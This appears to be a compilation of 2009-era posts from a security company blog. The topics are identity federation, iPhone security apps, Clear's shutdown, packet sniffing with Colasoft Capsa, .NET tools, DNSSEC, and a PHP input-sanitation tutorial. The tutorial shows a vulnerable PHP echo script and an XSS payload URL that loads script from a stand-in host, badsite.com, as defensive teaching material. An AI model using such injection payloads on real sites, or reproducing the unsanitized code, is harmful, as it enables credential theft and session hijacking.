Les Jordan from Microsoft recently wrote a blog post entitled Identity Management: a key to seamless CTMS and EDC. In it, he presents some of the solutions Microsoft is introducing in the identity management space, currently under the name of Microsoft Geneva including the Geneva Framework, and the Microsoft Identity Federation Gateway.

The idea is fairly simple. Many (most?) large enterprises already manage their users and systems using Active Directory.  Geneva allows publishing the components of your Active Directory required for doing identity federation on the Internet.  The publishing is performed in a standards-compliant way (using WS-* and SAML 2.0) and allows it to be used for claims between enterprises.

…the issue of Identity Management, Username and Password proliferation, and cross-company collaboration is an issue that has hindered true (and secure) data availability and collaboration in the Life Sciences industry.  Perhaps now we can get the Identity Management issue behind us and move on.

Whether or not Geneva becomes the one standard way to allow interoperable identity management across multiple enterprises in the life sciences space, it is clearly going to lower barriers between organizations and increase our trustworthiness in digital identities.

With the release of the new iPhone 3.0, I thought it would be worth visiting some useful security-related iPhone applications. These are 4 good security applications for the iPhone that will make you the coolest person at the next IT security conference.

1. 1Password (Cost: $4.99) – This application encrypts your iPhone data using AES, effectively features single sign-on to websites, and adds an extra unlock code layer to your device – using a single password. The power of this application is in the encryption, and has some other goodies like password generation and secure notes built in as well as a desktop version and syncing (for extra).
2. RSA SecurID Software Token (Cost: Free) – SecurID relies on 2-factor authentication, and your iPhone can act as one of those factors. This application will generate a rotating passcode to be used with some other hardware token. This application is only useful if your organization is already using RSA Authentication Manager.
3. Security for People and Computers eBook (Cost: Free) – Written by Neal Puff (CISSP), one of Computerworld’s Premier 100 IT Leaders with over 20 years of IT experience offers this eBook focused on general computer and networking security with some additional information on protecting your home. I haven’t read the eBook but it’s free and worth a look.
4. MobileMe (Comes with iPhone 3.0) – Ok, admittedly this isn’t an iPhone app in the traditional sense, but the new Find My Phone feature lets you know where your iPhone is if it’s lost or stolen. While a dramatic recovery isn’t likely, MobileMe’s other features like remote data wiping can help protect your data from thieves.

There are a couple of good security iPhone apps out there I’ve likely missed but there are also tons and tons of really bad iPhone security applications as well. Know of any to add to this list, good, bad, or even silly? As always, comments are welcome.

Each Thursday, Security Musings features a security-related technology or tool. Featured items do not imply a recommendation by Gemini Security Solutions. For more information about how Gemini Security Solutions can help you solve your security issues, contact us!

Microsoft released its new Security Essentials in beta today. So far, the reports are that it’s nice. I don’t run Windows except within VMWare, so I’m not going to be testing it out anytime soon, but I’d love to hear what you think about it.

However, the security essentials will only work on “genuine” windows systems. Microsoft fought this battle before with security patches. They had initially said that security patches would only be available for “genuine” systems. However, that would have left an awful lot of systems vulnerable to attackers just because they were not legit (I’d love to see a statistic on what percentage aren’t). This is the same type of thing. Security is only available for those who go through the effort of getting their system checked (I know I’ve been canceling that particular window for the last few months). As long as other anti-virus makers are willing to step up and keep anti-virus available for those who don’t hassle with WGA, we won’t see any problems, but I suspect we might see botnets form more easily otherwise.

Overnight, the Clear Registered Traveler Program ceased operation.  I do travel by air 5-10 times per year, and had considered the program to speed my visits through airports.  There were three main reasons why I didn’t, and I wonder if they are reasons why they have had to cease operation.

1. There weren’t Clear lanes at every airport I travel to; the only way this system could be cost effective for me would be if it worked everywhere.
2. As mentioned at the Consumerist, the Clear lanes just provide shorter lines; you still were subject to all the security checkpoint hassles.
3. My home airport, Dulles International, opened the Black Diamond lanes: basically the same as Clear without the fee.

In addition to the $199/year charge, enrolling in Clear required presentation of two IDs, your social security number, and the capture of your fingerprints and retinal scan. Clear lost (and found) a laptop last year, and although their privacy policy (pdf) indicates that all personal information is always stored and transmitted encrypted, it doesn’t indicate what algorithm is used or how key management is performed. (Remember, ROT13 is an encryption algorithm…)  Biometrics are the only identification factor that you can’t have revoked and reissued, so giving mine up to both a private company and the Transportation Security Administration to save perhaps 15 minutes didn’t seem like a good idea.

The privacy policy also indicates that personal information is removed from their system automatically after 90 days if you are no longer a Clear member. It is not yet clear if the cessation of operation that occurred overnight will trigger this data removal event. It is also not clear if the TSA ever gives up your data which Clear shares.  All told, if I had been a Clear member, I would seriously examine tools for detecting and preventing identity theft for a while.

This builds off of Sniffing Networks Part 3- Understanding what you’re seeing.  This article introduces another tool to use for network sniffing and compares it to the previously mentioned Wireshark.

You’ve already been introduced to Wireshark and learned how to use it.  We now consider another tool, Colasoft Capsa Enterprise Edition, which can be used for network sniffing as well.  Colasoft Capsa offers many of the same features as Wireshark and introduces new features in analysis.  Similar to Wireshark, Colasoft Capsa captures and decodes packets, and supplies a hex view of each packet.  Below is a screenshot of the packet view in Colasoft Capsa.  Both programs automatically color code protocols.

Colasoft Capsa allows you to apply filters to view select types of packets or view all but the selected packets.  Filters can be applied by address, port, or protocol as well.  It is also possible to enable advanced filters which are similar to Wireshark’s filters.  In advanced filters, you can combine specific addresses, ports, protocols, and packets by size, value, or pattern in any combination using “and,” “or,” and “not” logic modifiers.

It is possible to view related packets in Colasoft Capsa by right-clicking a packet and choosing an option from “Select Related Packets.”  This action will highlight packets related in the specified manner.  Choosing “By Flow” from the related packets menu results in highlighting the packets that Wireshark glues together when selecting “Follow TCP Stream.”  While this shows the related packets, Colasoft Capsa does not show all packets of a stream in one window as Wireshark does.  Other relations for grouping packets in Colasoft Capsa include by source, destination, or protocol.

Colasoft Capsa offers many of the analysis features that are found in Wireshark.  For example, both programs can display endpoints and protocols from the captured packets along with statistics on the amount of information sent and received for each.  The difference is that Colasoft Capsa adds a visual interpretation to the statistics.

Colasoft Capsa offers other visual aids such as graphs and a matrix view in which all endpoints that communicate are connected.  Additional features include reports, logs, and diagnostic capabilities that can be used to discover network problems.  All of Colasoft Capsa’s features are discussed in more detail in the article Using Colasoft Capsa.

This article builds off of the Sniffing Networks series and introduces Colasoft Capsa Enterprise Edition, which can be used for network sniffing and analysis.

To get started capturing packets with Colasoft Capsa, click on the “Start Capture Now” button on the opening screen. Clicking this will open the project settings, which can be customized depending on the project. The project settings can also be modified later by the toolbar at the top of the window. Click OK to get started. This starts the capture which can be stopped at any time by clicking the stop button along the top toolbar.

After capturing packets there will be two additional docked windows to the left, and the main window now contains ten tabs. The top left window labeled Explorer can be used as a filter of sorts to change the data seen and analyzed in the tabs to the right. The Project Status window gives a general overview of the project and packets captured. The summary tab provides a more in-depth look at the packets collected.

The diagnosis tab can be helpful for monitoring and solving problems on the network. Each diagnosis event falls under one of four network layers: application, transport, network, or data link; each event is also given a severity level depending on the type of event. All diagnosis events are predefined by the software. Clicking on a diagnosis event brings up a references tab within the window, which gives a description of the event and possible causes and solutions. The endpoints tab gives statistics for each of the physical endpoints of the network, which illustrates the flow of traffic.

The protocols tab separates the information by protocol. As seen above, the bytes used for each are displayed as a bar. The protocols are listed as a hierarchy, so there is overlap within the total bytes. The conversation tab is divided into two windows. The top window shows all the connections made between different endpoints. The type of endpoint can be changed to represent either physical, IP, TCP, or UDP endpoints. All packages that relate to the conversation are displayed on the bottom window on the screen.

The matrix view, as seen below, visually shows all the endpoints and the connections they make with each other. Essentially, every conversation is shown as a line. The endpoints displayed can be sorted by physical or IP, as well as any combination of unicast, multicast, and broadcast traffic types.

The packets tab displays the packets as they are captured and provides information on source, destination, size, and protocol. The packets tab also has a window that decodes the selected packet. To help sort through the packets, you can right click on a packet and choose “Select Related Packets” to show packets related by source, destination, flow, or protocol.

The logs view keeps track of events such as HTTP requests, email messages, DNS queries, and instant messenger activities. All logs are enabled in the default project settings, but any or all can be excluded. The logs can also be set to be automatically saved to a file.

The graphs can be useful for presenting data because they give a visual interpretation of the numbers. There are many groupings of information for the graphs and many types of graphs, including line graphs, area graphs, bar graphs, pie charts, and 3-D options. It is also possible to compare two graphs. The last tab, reports, is similar to the summary tab but presents data by integrating numbers and graphics. This tab contains packet and protocol statistics, diagnosis events, and charts such as top ten IP protocols and top ten physical addresses.

As mentioned earlier, the explorer window is one way to limit the information analyzed, but it is also possible to apply filters. Filters can be formed by packet, address, port, and protocol type, as well as more advanced filtering options.

In addition, Colasoft Capsa comes with four extra tools. These consist of a MAC Scanner, Packet Builder, Packet Player, and Ping tool. For more information on Colasoft Capsa and these tools, visit the Colasoft website at http://www.colasoft.com/.

This post isn’t going to deal with security directly, but rather with two command line tools that come with the .NET framework. The tools, WSDL.exe and XSD.exe, are used to easily create .NET wrapper classes to deal with web services and XML files, respectively. Both of these command line tools are installed alongside the .NET framework (on my machine, they’re located in C:\Program Files\Microsoft SDKs\Windows\v6.0A\bin, although if you start the Visual Studio command prompt, they should be accessible via PATH entries anyway).

The WSDL tool can quickly create a .NET class that can invoke remote web services given a WSDL service definition. A quick example of how to use the tool would be to open a command prompt and type:

wsdl /namespace:MyProgram.Services /username:user /password:password /out:MyWebService.cs http://webserver/services/MyWebService?wsdl

This will generate the C# class MyProgram.Services.MyWebService.cs in the current folder, with the appropriate objects defined to call the web service defined by that WSDL file. All you have to do is configure a credential (if needed), and you can use the web service through the object.

The XSD tool can be used to create an XSD file and a .NET class based on any XML file, including one you made up yourself with no related schema definition. The XML file could be as simple as:

<MyFolders>
   <Folder>c:\folder1</Folder>
   <Folder>c:\folder2</Folder>
</MyFolders>

Using the XSD tool, you can generate an XSD file to accompany this XML by opening a command prompt and running:
xsd MyFolders.xml

This will create the MyFolders.xsd schema definition file. Once we have that, we can generate a .NET wrapper class using the same tool:
xsd /namespace MyProgram.Xml /classes /language:CS MyFolders.xsd

This will create the MyProgram.Xml.MyFolders class in the file MyFolders.cs, which you can then use with the System.Xml.Serialization.XmlSerializer class to easily create objects from XML files and vice versa.

Each Thursday, Security Musings features a security-related technology or tool. Featured items do not imply a recommendation by Gemini Security Solutions. For more information about how Gemini Security Solutions can help you solve your security issues, contact us!

Most XSS and SQL injection vulnerabilities are due to improper sanitation of input data.

Cleaning such data is vitally important in maintaining the security of a website or web application.

This series of blog posts will examine several input sanitation examples within a PHP environment (raw data, data within attribute fields, database sanitation, etc).

It also assumes you know a bit about writing PHP code in the first place since we will be using some PHP functions. However, the general ideas we cover will be applicable to all dynamic web apps, regardless of the platform on which they are created.

Note: There are ways to clean MOST input data by simply using special libraries or a series of functions. However, by covering basic cases (including how each one poses a threat and how each one may be corrected individually) we are able to give a much broader view of the fundamental problems associated with improper data sanitation and the dangers of injection.

Case 1: Basic Raw Data Input/Output

This case is for the (probably rare) situations in which your code displays exactly what the user typed into the body of the HTML output (not necessarily within a tag itself).

Example Script: example1.php

---------------------------
<?php

$test_input = $_REQUEST['test_input'];
echo " You entered: $test_input ";
?>
---------------------------

Assuming $test_input is the variable we want to clean up, we simply need to make sure that the data doesn’t have any HTML tags in it. After all, without tags, it is just text data. If this data was displayed without sanitation, a malicious user could easily inject some <script type="text/javascript">
tags and do… bad things. Very bad. Horrifying even.

It’d look something like this:

http://example.com/example.php?test_input=<script src="http://badsite.com/verybad/omg_this_is_horrifying.js" mce_src="http://badsite.com/verybad/omg_this_is_horrifying.js" />

This would inject a script element in which the contents of the script at badsite.com are executed within the context of the user visiting the website. This can result in everything from stolen credentials, to session hijacks, to phishing attempts.

So, to clean those pesky HTML tags, we can simply convert the left and right angle brackets to something a little more pleasant. Blank spaces, non-blank blank spaces, pictures of kittens, etc. Personally, I prefer the HTML special character entities < and > since they look the same as the HTML tag delimiters, but are completely harmless. (Pro tip: lt and gt stand for ‘less than’ and ‘greater than’ respectively.)

There are many ways to do the switcheroo… but here is one example:

Example Script: example1_fixed.php

---------------------------
<?php

$test_input = $_REQUEST['test_input'];
$test_input = str_replace('<', "&lt;", $test_input); // first the left angle bracket
$test_input = str_replace('>', "&gt;", $test_input); // then the right angle bracket
echo "<html><body> You entered: $test_input </body></html>";
?>
---------------------------

Now your code will sanitize that input and protect against XSS attacks of this nature. However, things get hairy when that data is used as an attribute within a tag or in other sensitive parts of the HTML source.

But that will be covered in Part 2: Data Used as an Attribute Within a Tag or in Other Sensitive Parts of the HTML Source.

Each Tuesday, Security Musings features a topic to help educate our readers about security. For more information about Gemini Security Solutions’ security education capabilities, contact us!

It’s been in the news lately. Both the Root Domain and the .ORG domain are implementing DNSSEC. So what does that mean? It means that a lot of attacks that require spoofing DNS will no longer work as easily.

There is lots of information over at dnssec.net, including links to all of the relevant RFCs, but I’m going to give the simple layman’s description of DNSSEC. DNSSEC uses Public Key cryptography, so a basic understanding of it will be very useful.

The root (.) domain authorizes all of the top-level domains (TLDs), things like .net, .com, and .org (among many others). Each TLD owner then authorizes the creation of sub-domains, like securitymusings.com. When a domain implements DNSSEC, it means that it will sign all of its responses. If I want to know the IP address of securitymusings.com, my computer first asks my ISP’s DNS servers. It doesn’t know, so it tells my computer to ask the root domain who to ask about the .com domain. The root domain responds with the IP address(es) of the DNS server(s) that control the .com domain. Then, I ask the .com DNS server what is the IP address of the securitymusings.com? It doesn’t know, but it does know the DNS server for securitymusings.com, so it sends me there. Finally, when I ask what the IP address of securitymusings.com is (again), the proper DNS server responds. There’s a lot of caching going on in there, but we can ignore it for now. With DNSSEC, each domain will need its own private key. All responses from that domain’s DNS servers will be signed with that private key. And so on down the list of responses I get. My client has to check the validity of each signature on the response. It adds a bit of overhead, but the spec still allows for caching and that will help speed the process up a bit.

So, if you own a .org domain, what can you do about it? If you’re running your own DNS servers, you can have your domain signed by the .org key. You’ll have to check with your registrar to see how (and when) to go about doing that. As far as I know, none are offering it yet. Those with .com domains? You’re out of luck for a while unless you’re going to use it internally only.

Each Tuesday, Security Musings features a topic to help educate our readers about security. For more information about Gemini Security Solutions’ security education capabilities, contact us!

As many have noticed, Apple has released their new lineup of laptops, software, OSes, and iPhones. As I watched live coverage of the keynotes on Monday (thanks Gizmodo) – a few things caught my attention when they were speaking about the new iPhone 3G S.
The first thing that caught my eye was the mention of “hardware encryption.” Now, simply mentioning that a device supports hardware encryption can mean a lot of things, and Apple isn’t very clear about what they mean by this. Trying to do some further research didn’t help much either as I only ended up being further confused with all the different mentions of this “hardware encryption.” The official word from Apple is…

iPhone 3G S offers highly secure hardware encryption that enables instantaneous remote wipe. You can even encrypt your iTunes backups.

…according to that, it would sound like the remote wipe is dependent on the hardware encryption, which makes me believe that instead of actually wiping the data (as in a format), it would simply delete the private key – therefore making the data inaccessible. (Since iTunes stores a backup of all your iPhone data at every sync, securing this also seems important.)  This also assumes it’s using a strong form of encryption. I’ve also read in other posts…

…hardware encryption for Exchange users…

…as the listed feature. Does this mean it’s only available through Exchange, and at what level is it being used? Is it only securing your email? We know the iTunes songs and videos are already being encrypted on the device. Is this the same form of encryption they’re talking about?  We’ve asked an insider at Apple to help us out with some of these questions and are still awaiting a response.

All of this brings up major questions about the REAL security behind all these marketing terms. How much do companies actually care about security, and how much do they actually do to help protect their users? Is everything just a marketing ploy these days?

Users were upset about the lack of security in our last model of product X. Let’s add minor revisions and throw some good marketing verbiage in the features list and hope that fixes everything.

Is this how security is being treated? Apple isn’t the only company being vague about these types of issues; it rolls all across the board. They just happen to be the ones asking for the most attention at his current point in time.  Stay tuned as I hope to find and relay some answers to many of these questions as more details are revealed.